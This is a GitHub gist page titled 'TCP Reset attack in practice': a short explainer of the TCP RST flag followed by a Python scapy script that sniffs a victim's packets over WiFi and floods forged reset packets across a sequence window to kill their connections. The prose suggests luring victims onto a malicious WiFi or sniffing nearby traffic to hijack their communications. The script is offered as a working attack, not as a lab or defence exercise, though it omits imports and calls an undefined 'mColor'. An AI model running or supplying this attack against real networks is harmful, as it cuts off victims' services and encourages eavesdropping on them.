Skip to content

Instantly share code, notes, and snippets.

@Xarrow

Xarrow/tcp-reset.org

Forked from spinpx/tcp-reset.org
Created September 17, 2018 05:53
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Xarrow/8d65bfee91436dc33a1e4efc5f5417a2 to your computer and use it in GitHub Desktop.
Save Xarrow/8d65bfee91436dc33a1e4efc5f5417a2 to your computer and use it in GitHub Desktop.
Download ZIP
TCP Reset attack in practice #Security #Network
Raw
tcp-reset.org

TCP Reset attack

RESET is a flag in TCP packets to indicate that the conection is not longer working. So, if any of the two participants in a TCP connection send a packet contains such a RESET flag, the connection will be closed immediately.

Thus it can be use to attack TCP connections once the attacker can forge TCP packets from any of the two parties if he or she know their IPs, ports and the sequence number of current TCP connection.

The attack can be used to make certain users to fail to use certain network services based on TCP if we know the information above.

In practice, we should eavesdrop the victims’ communications to get their IPs, ports and the sequence number. You can do it by:

  • Trick them to connect a malicious WiFi, or use other ways to hijack their communications.
  • Sniff WiFi packets if they are near you and using WiFi.

We can filter the TCP packets and find the newest packets that we want to attack.

We can sends a TCP packet with RESET flag and the IPs and ports of source and destination are sniffed from victims. What’s more, the sequence number will increase in TCP communication, its value should be equal or lager than the ack value from the lastest packet the sender received and in the window of receiver. So we should update it. To ensure successful, we can send lots of packets with different sequence number which is larger than the sniffed ack field.

We can implement the TCP Reset attack with scapy in Python. The code is in tcp-reset.py.

Useful reference:

  • Watson, P.: Slipping in the Window: TCP Reset attacks. (2004)
Raw
tcp-reset.py
win=512
tcp_rst_count = 10
victim_ip = "192.168.1.1"
your_iface = "mon0"
# get a tcp packet by sniffing WiFi
t = sniff(iface=your_iface, count=1,
lfilter=lambda x: x.haslayer(TCP)
and x[IP].src == victim_ip)
t = t[0]
tcpdata = {
'src': t[IP].src,
'dst': t[IP].dst,
'sport': t[TCP].sport,
'dport': t[TCP].dport,
'seq': t[TCP].seq,
'ack': t[TCP].ack
}
max_seq = tcpdata['ack'] + tcp_rst_count * win
seqs = range(tcpdata['ack'], max_seq, int(win / 2))
p = IP(src=tcpdata['dst'], dst=tcpdata['src']) / \
TCP(sport=tcpdata['dport'], dport=tcpdata['sport'],
flags="R", window=win, seq=seqs[0])
for seq in seqs:
p.seq = seq
send(p, verbose=0, iface=your_iface)
print(mColor.success('tcp reset attack finish'))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment